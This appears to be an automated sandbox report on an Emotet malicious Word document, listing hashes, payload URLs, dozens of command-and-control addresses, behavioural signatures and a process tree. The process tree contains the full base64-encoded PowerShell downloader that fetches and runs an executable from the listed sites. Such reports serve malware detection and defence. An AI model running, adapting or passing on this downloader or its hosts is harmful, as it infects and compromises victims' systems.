Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
01-08-2020 02:11
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e2_c1428a65c5e75c9b7ee41ad547278aedd961bd3491449fbfde3000c771cba87c_2020-08-01__021028._doc.doc
Resource
win7
General
-
Target
emotet_e2_c1428a65c5e75c9b7ee41ad547278aedd961bd3491449fbfde3000c771cba87c_2020-08-01__021028._doc.doc
-
Size
171KB
-
MD5
a607b2c0888e58fd92225bc68770c332
-
SHA1
d16bd800b58a926db38c1bb13e9d27ca964ad1de
-
SHA256
c1428a65c5e75c9b7ee41ad547278aedd961bd3491449fbfde3000c771cba87c
-
SHA512
97861f8230c67ae9d66a4ff130e1417434c89fd98d66da30019b7bfa4957fbced269470a14defa27688a1e599ec372dc263cd2295172c4828d625a96b6c62bad
Malware Config
Extracted
http://muliarental.com/wp-includes/uwr_u4_ed3qzbb/
http://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/
http://my6thgen.org/_db_backups/t_e_v7qizcr2/
http://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/
http://www.naayers.org/Library/o_eo_97ml/
Extracted
emotet
142.105.151.124:443
62.108.54.22:8080
212.51.142.238:8080
71.208.216.10:80
108.48.41.69:80
83.110.223.58:443
210.165.156.91:80
104.131.44.150:8080
104.236.246.93:8080
5.39.91.110:7080
209.141.54.221:8080
209.182.216.177:443
153.126.210.205:7080
91.211.88.52:7080
180.92.239.110:8080
183.101.175.193:80
162.241.92.219:8080
87.106.139.101:8080
114.146.222.200:80
65.111.120.223:80
113.160.130.116:8443
190.160.53.126:80
62.75.141.82:80
46.105.131.87:80
203.153.216.189:7080
46.105.131.79:8080
91.231.166.124:8080
81.2.235.111:8080
189.212.199.126:443
95.9.185.228:443
169.239.182.217:8080
47.153.182.47:80
116.203.32.252:8080
139.130.242.43:80
75.139.38.211:80
41.60.200.34:80
47.144.21.12:443
103.86.49.11:8080
95.179.229.244:8080
173.91.22.41:80
70.167.215.250:8080
110.145.77.103:80
85.59.136.180:8080
5.196.74.210:8080
24.234.133.205:80
76.27.179.47:80
104.131.11.150:443
87.106.136.232:8080
61.19.246.238:443
201.173.217.124:443
176.111.60.55:8080
200.55.243.138:8080
74.208.45.104:8080
139.59.60.244:8080
67.241.24.163:8080
24.43.99.75:80
93.51.50.171:8080
109.74.5.95:8080
137.59.187.107:8080
37.139.21.175:8080
157.245.99.39:8080
124.45.106.173:443
47.146.117.214:80
95.213.236.64:8080
62.138.26.28:8080
190.55.181.54:443
24.179.13.119:80
152.168.248.128:443
222.214.218.37:4143
168.235.67.138:7080
181.230.116.163:80
121.124.124.40:7080
79.98.24.39:8080
37.187.72.193:8080
162.154.38.103:80
78.24.219.147:8080
200.41.121.90:80
185.94.252.104:443
50.116.86.205:8080
Signatures
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4000 powersheLL.exe 4000 powersheLL.exe 4000 powersheLL.exe 2160 ms3dthumbnailprovider.exe 2160 ms3dthumbnailprovider.exe 2160 ms3dthumbnailprovider.exe 2160 ms3dthumbnailprovider.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 23 4000 powersheLL.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2100 wrote to memory of 2160 2100 659.exe 77 PID 2100 wrote to memory of 2160 2100 659.exe 77 PID 2100 wrote to memory of 2160 2100 659.exe 77 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\ConfigureExpandedStorage\ms3dthumbnailprovider.exe 659.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 3288 WINWORD.EXE 3288 WINWORD.EXE 3288 WINWORD.EXE 3288 WINWORD.EXE 3288 WINWORD.EXE 3288 WINWORD.EXE 3288 WINWORD.EXE 3288 WINWORD.EXE 3288 WINWORD.EXE 2100 659.exe 2160 ms3dthumbnailprovider.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3288 WINWORD.EXE 3288 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4000 2536 powersheLL.exe 69 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4000 powersheLL.exe -
Executes dropped EXE 2 IoCs
pid Process 2100 659.exe 2160 ms3dthumbnailprovider.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
resource yara_rule behavioral2/memory/2100-9-0x00000000004B0000-0x00000000004BC000-memory.dmp emotet behavioral2/memory/2100-9-0x00000000004B0000-0x00000000004BC000-memory.dmp emotet behavioral2/memory/2160-12-0x00000000020F0000-0x00000000020FC000-memory.dmp emotet behavioral2/memory/2160-12-0x00000000020F0000-0x00000000020FC000-memory.dmp emotet
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_c1428a65c5e75c9b7ee41ad547278aedd961bd3491449fbfde3000c771cba87c_2020-08-01__021028._doc.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:3288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABJAFEAWQBKAFUAcABwAG0APQAnAFcASwBPAFkATwB6AHcAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAFUAYABSAGkAYABUAFkAUABSAG8AVABgAG8AYwBPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABGAFkATwBGAEUAbgBkAHoAIAA9ACAAJwA2ADUAOQAnADsAJABJAFcAUgBHAEgAawB0AHMAPQAnAFQARgBZAEMAUwBnAGIAawAnADsAJABWAFgASwBJAFgAZABoAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAWQBPAEYARQBuAGQAegArACcALgBlAHgAZQAnADsAJABMAEQAVQBUAEwAcgBrAHMAPQAnAEcASgBQAEkASwB3AHoAcQAnADsAJABRAEcAUQBaAEEAdABxAG8APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBFAGIAQwBMAGkAZQBuAHQAOwAkAFIAVQBVAE4ASgB5AHoAcQA9ACcAaAB0AHQAcAA6AC8ALwBtAHUAbABpAGEAcgBlAG4AdABhAGwALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHUAdwByAF8AdQA0AF8AZQBkADMAcQB6AGIAYgAvACoAaAB0AHQAcAA6AC8ALwBsAHQAcgB5AGIAdQBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AbQBmAGYAXwB4AGEAbwA5AGQAXwA1AGwAZAA1AHEAYQBqAGYAbQB4AC8AKgBoAHQAdABwADoALwAvAG0AeQA2AHQAaABnAGUAbgAuAG8AcgBnAC8AXwBkAGIAXwBiAGEAYwBrAHUAcABzAC8AdABfAGUAXwB2ADcAcQBpAHoAYwByADIALwAqAGgAdAB0AHAAOgAvAC8AbQB5AHcAZQBiAG4AZQByAGQALgBjAG8AbQAvAGIAbAB1AGUAcwBmAG8AcgBzAGEAbABlAC8AegBpADYAXwB2ADQAZwAwAF8AcgBtAHkAZwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG4AYQBhAHkAZQByAHMALgBvAHIAZwAvAEwAaQBiAHIAYQByAHkALwBvAF8AZQBvAF8AOQA3AG0AbAAvACcALgAiAFMAUABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgBLAFIAWgBBAHgAcQBzAD0AJwBZAEgAVgBTAE4AbwB3AGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkASgBMAEcAUwByAGsAYgAgAGkAbgAgACQAUgBVAFUATgBKAHkAegBxACkAewB0AHIAeQB7ACQAUQBHAFEAWgBBAHQAcQBvAC4AIgBkAE8AdwBuAGAATABgAG8AYQBkAGAARgBpAEwARQAiACgAJABZAEoATABHAFMAcgBrAGIALAAgACQAVgBYAEsASQBYAGQAaABjACkAOwAkAEoAUABMAEEAVgBvAGoAbQA9ACcASQBLAFUAQwBDAGMAcwBrACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVgBYAEsASQBYAGQAaABjACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMgAwADYAMAAzACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIAZQBgAEEAdABlACIAKAAkAFYAWABLAEkAWABkAGgAYwApADsAJABNAEMAWABDAFQAawBtAGwAPQAnAE8AVgBCAE0AQwBpAHEAYQAnADsAYgByAGUAYQBrADsAJABRAE8AQwBRAE4AbgBpAGgAPQAnAFYARQBUAEEARABuAG8AdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAE0AUwBQAEkAZABlAHkAPQAnAEgAWQBTAFQATQBiAHAAdAAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
C:\Users\Admin\659.exeC:\Users\Admin\659.exe1⤵
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:2100 -
C:\Windows\SysWOW64\ConfigureExpandedStorage\ms3dthumbnailprovider.exe"C:\Windows\SysWOW64\ConfigureExpandedStorage\ms3dthumbnailprovider.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:2160
-